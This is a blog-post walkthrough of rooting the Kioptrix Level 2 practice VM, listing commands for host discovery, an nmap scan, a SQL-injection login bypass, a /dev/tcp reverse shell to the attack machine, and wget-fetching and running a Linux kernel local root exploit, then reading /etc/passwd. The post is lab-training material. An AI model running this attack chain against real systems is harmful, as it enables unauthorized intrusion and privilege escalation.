It's been a while I last updated this blog (been working on some projects lately), but I had to steal time out to make this.

In this session, we will be having a look at gaining root priviledges using command execution

Overview

Our target system is Kioptrix 2.

Kioptrix is a “Vulnerable-By-Design OS” which serves as a Pentest lab for security enthusiasts to legally try out their skills with the aim to completely compromise the machine.

The video describes a step-by-step way of going about this.

What Resources Do We Need?

   * Kioptrix – Level 2 VM. Download here
   * A Virtual Machine (Example: VMware Player or Virtual Box)

   * Nmap – (Can be found on BackTrack 5-R2). Download here
   * Firefox –  (Can be found on BackTrack 5-R2)
   * Linux Kernel 2.6 Root Exploit – (Can be found on exploit-db.com)  

Steps

   * Discover network for hosts (Netdiscover)     
   * Scan target network (Nmap)
   * Bypass login screen (MySQL Injection)   
   * Set NetCat to listen on attack machine    
   * Inject bash reverse shell.
   * Navigate to directory where apache user can write files (cd /tmp)   
   * Search for Local privilege escalation exploit for linux kernel version 2.6
   * Download exploit code and host it on attack machine
   * Use reverse shell to wget exploit code to Victim’s machine
   * Compile exploit code and Execute.
   * Game Over

  Commands

netdiscover –r 192.168.61.0/24
nmap 192.168.61.130 –p 1-65500 –o –sS –sV –v
clear
firefox 192.168.61.130
-> User: admin 
-> Password: 1’ or ‘1--

; cat index.php
nc –lvvp 4000
// We want to get a basic shell on the server, so we’ve setup our netcat listener to listen on port 4000 for the shell
/bin/sh 0</dev/tcp/192.168.61.128/4000 1>&0 2>&0

//Using bash, we have successfully created our connect back shell code with a single line of command
uname –a
whoami
// we are still apache user and the objective says we should be “root”
Cat /etc/issue
Firefox www.exploit-db.com
Search for “linux kernel 2.6”
Download ip_append_data() local ring0 root exploit
wget 192.168.61.128/9542.c
//Download the exploit code “9542.c” to the victim’s machine
gcc 9542.c –o RootMeNow
//Compile the exploit code
./RootMeNow
cat /etc/passwd
cat /etc/passwd && whoami && uname –a
cd /var/www
cd html
ls
whoami

 #####                          #######
#     #   ##   #    # ######    #     # #    # ###### #####
#        #  #  ##  ## #         #     # #    # #      #    #
#  #### #    # # ## # #####     #     # #    # #####  #    #
#     # ###### #    # #         #     # #    # #      #####
#     # #    # #    # #         #     #  #  #  #      #   #
 #####  #    # #    # ######    #######   ##   ###### #    #

Songs

– 07 Drive It Like You Stole It (Mindelixir Remix)

– 10 A Dream Within A Dream (Skeet Skeet Remix)

Kindly use the comment box below for feedbacks

– InfosecShinobi